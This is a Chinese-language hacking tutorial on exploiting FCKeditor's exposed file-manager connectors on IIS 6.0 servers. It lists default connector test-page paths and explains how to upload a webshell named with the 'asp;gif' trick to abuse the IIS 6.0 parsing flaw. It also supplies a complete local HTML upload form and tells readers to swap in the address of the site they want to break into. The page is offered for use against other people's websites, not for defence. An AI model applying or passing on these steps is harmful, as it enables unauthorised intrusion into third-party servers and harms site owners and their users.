FCkEditor编辑器漏洞（IIS 6.0）

Fckeditor编辑器的漏洞几乎和ewebeditor编辑器漏洞一样严重.

与ewebeditor编辑器不通的是,Fckeditor编辑器的漏洞只存在于暴露编辑器的上传点和服务器IIS版本必须是iis6.0版本

（因为IIS6.0存在解析漏洞）

 

反之如果说服务器的IIS版本为6.0以上则无法利用。

一般情况下fckeditor编辑器的默认上传地址为:

/expansion/fckeditor/editor/filemanager/connectors/test.html
/expansion/fckeditor/editor/filemanager/connectors/uploadtest.html

如下图所示:

1知道了编辑器的上传地址后选择Connector项目的网站语言 一般情况下是选择asp 或者 asp.net

2.然后点击 Get Folders and Files  即可查看网站的图片目录文件 然后即可点击 浏览 选择我们的网站木马 点击上传即可。

3.上传成功后回到 Get Folders and Files 即可查看到上传的文件

如上图所示图片目录为 /uploadfile/  我们的木马名字是  exehack.asp;gif  

（注意:上传成功后一般情况下系统会自动按照时间格式改名大家可以在图片目录下查看上传成功后的木马名字）

如果我们存在漏洞的网站是http://exehack.net 网站那么上传成功后的木马文件就在http://exehack.net/uploadfile/木马.asp;gif

 

---

由于Fckeditor是一款比较老的编辑器了 漏洞也存在了比较长的时候.有时候存在漏洞的页面被管理员或者别人删除或者修改了内容 

 

 

我们就无法找到上传点了。

比如如下情况:

那么我们可以在本地创建一个上传文件 文件代码如下:

 

<!-- * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == * * Licensed under the terms of any of the following licenses at your * choice: * *  - GNU General Public License Version 2 or later (the "GPL") *    http://www.gnu.org/licenses/gpl.html * *  - GNU Lesser General Public License Version 2.1 or later (the "LGPL") *    http://www.gnu.org/licenses/lgpl.html * *  - Mozilla Public License Version 1.1 or later (the "MPL") *    http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Test page for the File Browser connectors. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>FCKeditor - Connectors Tests</title>     <script type="text/javascript"> function BuildBaseUrl( command ) {     var sUrl =         document.getElementById('cmbConnector').value +         '?Command=' + command +         '&Type=' + document.getElementById('cmbType').value +         '&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ;     return sUrl ; } function SetFrameUrl( url ) {     document.getElementById('eRunningFrame').src = url ;     document.getElementById('eUrl').innerHTML = url ; } function GetFolders() {     SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;     return false ; } function GetFoldersAndFiles() {     SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;     return false ; } function CreateFolder() {     var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;     if ( ! sFolder )         return false ;     var sUrl = BuildBaseUrl( 'CreateFolder' ) ;     sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;     SetFrameUrl( sUrl ) ;     return false ; } function OnUploadCompleted( errorNumber, fileName ) {     switch ( errorNumber )     {         case 0 :             alert( 'File uploaded with no errors' ) ;             break ;         case 201 :             GetFoldersAndFiles() ;             alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;             break ;         case 202 :             alert( 'Invalid file' ) ;             break ;         default :             alert( 'Error on file upload. Error number: ' + errorNumber ) ;             break ;     } } this.frames.frmUpload = this ; function SetAction() {     var sUrl = BuildBaseUrl( 'FileUpload' ) ;     document.getElementById('eUrl').innerHTML = sUrl ;     document.getElementById('frmUpload').action = sUrl ; }     </script> </head> <body>     <table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0"> <tr>             <td>                 <table cellspacing="0" cellpadding="0" border="0">                     <tr>                         <td>                             Connector:<br />                             <select id="cmbConnector" name="cmbConnector"><!-- 改地址的地方 -->  <option value="http://www.exehack.net/expansion/fckeditor/editor/filemanager/connectors/asp/connector.asp" selected="selected">ASP</option>   <option value="http://www.exehack.net/expansion/fckeditor/editor/filemanager/connectors/aspx/connector.aspx" selected="selected">ASP.Net</option>   <option value="http://www.exehack.net/expansion/fckeditor/editor/filemanager/connectors/php/connector.php" selected="selected">PHP</option>   <option value="http://www.exehack.net/expansion/fckeditor/editor/filemanager/connectors/php/connector.php" selected="selected">小残<span style="color: red;font-size: 8px;">PHP</span></option><!-- 改地址的地方 -->                            </select>                         </td>                         <td>                                </td>                         <td>                             Current Folder<br />                             <input id="txtFolder" type="text" value="/" name="txtFolder" /></td>                         <td>                                </td>                         <td> Resource Type<br />                             <select id="cmbType" name="cmbType">                                 <option value="File" selected="selected">File</option>                                 <option value="Image">Image</option>                                 <option value="Flash">Flash</option>                                 <option value="Media">Media</option>                                 <option value="Invalid">Invalid Type (for testing)</option>                             </select>                         </td>                     </tr>                 </table>                 <br />                 <table cellspacing="0" cellpadding="0" border="0">                     <tr>                         <td valign="top">                             <a href="#" onclick="GetFolders();">Get Folders</a></td>                         <td>                                </td>                         <td valign="top">                             <a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>                         <td>                                </td>                         <td valign="top">                             <a href="#" onclick="CreateFolder();">Create Folder</a></td>                         <td>                                </td> <td valign="top">                             <form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data">                                 File Upload<br />                                 <input id="txtFileUpload" type="file" name="NewFile" />                                 <input type="submit" value="Upload" onclick="SetAction();" />                             </form>                         </td>                     </tr>                 </table>                 <br />                 URL: <span id="eUrl"></span>             </td>         </tr>         <tr>             <td height="100%" valign="top">                 <iframe id="eRunningFrame" src="javascript：void(0)" name="eRunningFrame" width="100%"                     height="100%"></iframe>             </td>         </tr>     </table> </body> </html>

可以将以上代码中的  http://www.exehack.net/expansion  修改为需要入侵的网站地址后将代码保存为1.html 然后打开进行上传